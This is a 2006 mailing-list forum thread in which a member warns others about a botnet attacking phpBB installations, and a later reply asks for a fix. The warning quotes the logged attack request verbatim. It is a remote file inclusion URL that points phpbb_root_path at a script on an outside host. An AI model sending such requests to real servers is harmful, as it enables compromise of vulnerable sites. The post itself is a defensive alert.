|
|
 |
Re: FN-FORUM: phpBB attacks
date posted 17th October 2006 10:32
did you find a solution to this as my customer is receiving them every hour
Lorna
----- Original Message -----
From: "Lee Fogarty" [EMAIL REMOVED]
To: [EMAIL REMOVED]
Sent: Monday, October 16, 2006 8:11 PM
Subject: FN-FORUM: phpBB attacks
>
> I just noticed a new attack doing the rounds. I don't know if any of you
> use phpBB in any way, shape or form, but if you do, please take note.
>
> It attacks with a
>
> GET
> /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
>
> The agentstring is always "libwww-perl/5.65" and the request is 663 bytes
> according to the log.
>
> Several hundred were received over the past 15 or minutes so far, all from
> different addresses (botnet?).
> Not that it will do anything other than the server dishing out 404 errors,
> but I thought I'd mention it anyway.
>
>
> --
> Freelancers, contractors earn more with Prosperity4
> Call 0870 870 4414 or visit www.prosperity4.com
> and benefit from Inland Revenue approved expenses today.
>
> To advertise here: http://www.freelancers.net/advertising.html
>
> |
 |
|